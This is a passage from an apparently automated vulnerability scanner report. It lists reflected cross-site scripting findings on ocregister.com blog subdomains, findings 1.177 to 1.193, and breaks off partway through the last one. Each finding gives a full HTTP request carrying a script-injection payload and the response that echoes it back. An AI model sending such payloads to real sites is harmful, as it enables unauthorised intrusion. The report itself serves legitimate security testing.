...[SNIP]...

1.177. http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lagunahomes.ocregister.com
Path:   /2011/02/02/oceanfront-with-killer-views-a-deal/14224/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7745"><script>alert(1)</script>ced09a70bf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7745\"><script>alert(1)</script>ced09a70bf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/oceanfront-with-killer-views-a-deal/14224/?f7745"><script>alert(1)</script>ced09a70bf4=1 HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Link: <http://lagunahomes.ocregister.com/?p=14224>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64639


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
lication/rss+xml" title=" Oceanfront with killer views a deal? - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/?f7745\"><script>alert(1)</script>ced09a70bf4=1feed/" />
...[SNIP]...

1.178. http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lagunahomes.ocregister.com
Path:   /2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f68e"><script>alert(1)</script>a746ad081d4 was submitted in the REST URL parameter 5. This input was echoed as 9f68e\"><script>alert(1)</script>a746ad081d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/laguna-beach-home-sales-up-13-over-year/140209f68e"><script>alert(1)</script>a746ad081d4/ HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
alternate" type="application/rss+xml" title=" Page not found - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/140209f68e\"><script>alert(1)</script>a746ad081d4/feed/" />
...[SNIP]...

1.179. http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lagunahomes.ocregister.com
Path:   /2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 366d8"><script>alert(1)</script>65b84b53c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 366d8\"><script>alert(1)</script>65b84b53c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/?366d8"><script>alert(1)</script>65b84b53c1=1 HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Link: <http://lagunahomes.ocregister.com/?p=14020>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53131


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
/rss+xml" title=" Laguna Beach home sales up 13% over year - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/?366d8\"><script>alert(1)</script>65b84b53c1=1feed/" />
...[SNIP]...

1.180. http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/97740/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/01/really-no-housing-slump-in-san-marino/97740/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b73"><script>alert(1)</script>49eaba8a56a was submitted in the REST URL parameter 5. This input was echoed as 79b73\"><script>alert(1)</script>49eaba8a56a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/01/really-no-housing-slump-in-san-marino/9774079b73"><script>alert(1)</script>49eaba8a56a/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/9774079b73\"><script>alert(1)</script>49eaba8a56a/feed/" />
...[SNIP]...

1.181. http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/97740/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/01/really-no-housing-slump-in-san-marino/97740/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2156"><script>alert(1)</script>7f4f3a0d6f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2156\"><script>alert(1)</script>7f4f3a0d6f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/01/really-no-housing-slump-in-san-marino/97740/?c2156"><script>alert(1)</script>7f4f3a0d6f7=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/97740/?c2156\"><script>alert(1)</script>7f4f3a0d6f7=1feed/" />
...[SNIP]...

1.182. http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/02/a-new-home-for-kobe-bryant/97596/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9132"><script>alert(1)</script>89260b73642 was submitted in the REST URL parameter 5. This input was echoed as a9132\"><script>alert(1)</script>89260b73642 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/a-new-home-for-kobe-bryant/97596a9132"><script>alert(1)</script>89260b73642/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596a9132\"><script>alert(1)</script>89260b73642/feed/" />
...[SNIP]...

1.183. http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/02/a-new-home-for-kobe-bryant/97596/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa939"><script>alert(1)</script>23a10abfd00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa939\"><script>alert(1)</script>23a10abfd00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/a-new-home-for-kobe-bryant/97596/?fa939"><script>alert(1)</script>23a10abfd00=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=97596>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 117579


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
ternate" type="application/rss+xml" title=" A new home for Kobe Bryant? - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/?fa939\"><script>alert(1)</script>23a10abfd00=1feed/" />
...[SNIP]...

1.184. http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/02/homebuilding-slump-now-3-years-old/98070/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec6f3"><script>alert(1)</script>2d65ca2126c was submitted in the REST URL parameter 5. This input was echoed as ec6f3\"><script>alert(1)</script>2d65ca2126c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/homebuilding-slump-now-3-years-old/98070ec6f3"><script>alert(1)</script>2d65ca2126c/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070ec6f3\"><script>alert(1)</script>2d65ca2126c/feed/" />
...[SNIP]...

1.185. http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/02/homebuilding-slump-now-3-years-old/98070/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37e2a"><script>alert(1)</script>2f16017d2e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37e2a\"><script>alert(1)</script>2f16017d2e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/homebuilding-slump-now-3-years-old/98070/?37e2a"><script>alert(1)</script>2f16017d2e8=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=98070>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103079


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
application/rss+xml" title=" Homebuilding slump now 3 years old - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/?37e2a\"><script>alert(1)</script>2f16017d2e8=1feed/" />
...[SNIP]...

1.186. http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/03/orange-county-property/98182/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de683"><script>alert(1)</script>9b3add21ddf was submitted in the REST URL parameter 5. This input was echoed as de683\"><script>alert(1)</script>9b3add21ddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/orange-county-property/98182de683"><script>alert(1)</script>9b3add21ddf/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/03/orange-county-property/98182de683\"><script>alert(1)</script>9b3add21ddf/feed/" />
...[SNIP]...

1.187. http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /2011/02/03/orange-county-property/98182/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6abaf"><script>alert(1)</script>e1b7c34c143 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6abaf\"><script>alert(1)</script>e1b7c34c143 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/orange-county-property/98182/?6abaf"><script>alert(1)</script>e1b7c34c143=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=98182>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 145345


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
pe="application/rss+xml" title=" 5th straight jump for O.C. property index - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/?6abaf\"><script>alert(1)</script>e1b7c34c143=1feed/" />
...[SNIP]...

1.188. http://lansner.ocregister.com/category/outlooks/eyeball-11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /category/outlooks/eyeball-11/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 969aa"><script>alert(1)</script>21e3c1a89f6 was submitted in the REST URL parameter 1. This input was echoed as 969aa\"><script>alert(1)</script>21e3c1a89f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category969aa"><script>alert(1)</script>21e3c1a89f6/outlooks/eyeball-11/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category969aa\"><script>alert(1)</script>21e3c1a89f6/outlooks/eyeball-11/feed/" />
...[SNIP]...

1.189. http://lansner.ocregister.com/category/outlooks/eyeball-11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /category/outlooks/eyeball-11/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35fdf"><script>alert(1)</script>012deb55675 was submitted in the REST URL parameter 2. This input was echoed as 35fdf\"><script>alert(1)</script>012deb55675 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/outlooks35fdf"><script>alert(1)</script>012deb55675/eyeball-11/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Eyeball &#8217;11 - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category/outlooks35fdf\"><script>alert(1)</script>012deb55675/eyeball-11/feed/" />
...[SNIP]...

1.190. http://lansner.ocregister.com/category/outlooks/eyeball-11/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /category/outlooks/eyeball-11/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1d12"><script>alert(1)</script>f582b534ec7 was submitted in the REST URL parameter 3. This input was echoed as f1d12\"><script>alert(1)</script>f582b534ec7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/outlooks/eyeball-11f1d12"><script>alert(1)</script>f582b534ec7/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category/outlooks/eyeball-11f1d12\"><script>alert(1)</script>f582b534ec7/feed/" />
...[SNIP]...

1.191. http://lansner.ocregister.com/category/outlooks/eyeball-11/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lansner.ocregister.com
Path:   /category/outlooks/eyeball-11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c705"><script>alert(1)</script>feb32e4d31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c705\"><script>alert(1)</script>feb32e4d31b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/outlooks/eyeball-11/?3c705"><script>alert(1)</script>feb32e4d31b=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Eyeball &#8217;11 - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category/outlooks/eyeball-11/?3c705\"><script>alert(1)</script>feb32e4d31b=1feed/" />
...[SNIP]...

1.192. http://letters.ocregister.com/2011/02/01/states-economic-rock-bottom-closer-than-ever [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://letters.ocregister.com
Path:   /2011/02/01/states-economic-rock-bottom-closer-than-ever

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6706"><script>alert(1)</script>6bccede39c1 was submitted in the REST URL parameter 4. This input was echoed as b6706\"><script>alert(1)</script>6bccede39c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/01/states-economic-rock-bottom-closer-than-everb6706"><script>alert(1)</script>6bccede39c1 HTTP/1.1
Host: letters.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://letters.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
="alternate" type="application/rss+xml" title=" Page not found - Letters to the Editor - www.ocregister.com" href="http://letters.ocregister.com/2011/02/01/states-economic-rock-bottom-closer-than-everb6706\"><script>alert(1)</script>6bccede39c1feed/" />
...[SNIP]...

1.193. http://letters.ocregister.com/2011/02/02/egyptian-revolution-could-bring-u-s-trouble [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://letters.ocregister.com
Path:   /2011/02/02/egyptian-revolution-could-bring-u-s-trouble

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b12b"><script>alert(1)</script>29a0ab24421 was submitted in the REST URL parameter 4. This input was echoed as 2b12b\"><script>alert(1)</script>29a0ab24421 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/egyptian-revolution-could-bring-u-s-trouble2b12b"><script>alert(1)</script>29a0ab24421 HTTP/1.1
Host: letters.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
